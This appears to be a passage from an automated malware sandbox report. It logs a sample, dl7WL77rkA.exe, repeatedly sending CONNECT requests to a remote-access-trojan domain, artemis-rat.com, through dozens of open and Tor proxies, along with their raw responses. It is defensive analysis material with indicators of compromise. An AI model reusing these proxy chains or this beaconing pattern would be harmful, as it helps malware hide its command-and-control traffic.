                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.422770977 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            670192.168.2.551851178.154.228.1690503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.271229029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.119040012 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            671192.168.2.55195538.162.29.12731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.272944927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.683459044 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            672192.168.2.551853148.72.215.79486233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.274127007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.998727083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092879057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            673192.168.2.551295107.180.88.41576423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.274699926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            674192.168.2.5511065.59.141.9410803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.281891108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            675192.168.2.5518735.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.287594080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            676192.168.2.55187147.243.205.131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.288335085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.599297047 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            677192.168.2.550532111.53.178.24973023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.292443037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355211020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.330271006 CET71INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.154608011 CET126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Data Raw: 7b 22 63 6f 64 65 22 3a 22 30 78 30 31 39 30 30 30 31 33 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 67 65 74 20 68 74 74 70 20 68 65 61 64 65 72 20 66 61 69 6c 22 7d 0a
                                                                                                                                                                                                                                                            Data Ascii: {"code":"0x01900013","message":"get http header fail"}
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.945466042 CET126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Data Raw: 7b 22 63 6f 64 65 22 3a 22 30 78 30 31 39 30 30 30 31 33 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 67 65 74 20 68 74 74 70 20 68 65 61 64 65 72 20 66 61 69 6c 22 7d 0a
                                                                                                                                                                                                                                                            Data Ascii: {"code":"0x01900013","message":"get http header fail"}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            678192.168.2.551300162.214.225.223582403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.296562910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            679192.168.2.552032104.20.51.99803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.299871922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.454998016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            680192.168.2.551101186.194.119.20555663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.309151888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.436706066 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            681192.168.2.551879185.38.111.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.311659098 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.633116961 CET75INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.997690916 CET103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            682192.168.2.552059104.21.66.184803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.314523935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.468858004 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            683192.168.2.551869194.53.158.57532813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.314547062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.695595980 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Fri, 02 Jan 1970 04:07:31 GMT
                                                                                                                                                                                                                                                            Expires: Fri, 02 Jan 1970 04:07:31 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            684192.168.2.551205164.92.237.188555883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.317188025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389456034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405970097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.499047995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            685192.168.2.55119351.83.184.24191913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.317270994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.401101112 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            686192.168.2.551178101.255.150.4980893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320429087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.656258106 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            687192.168.2.552069104.16.195.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320760965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
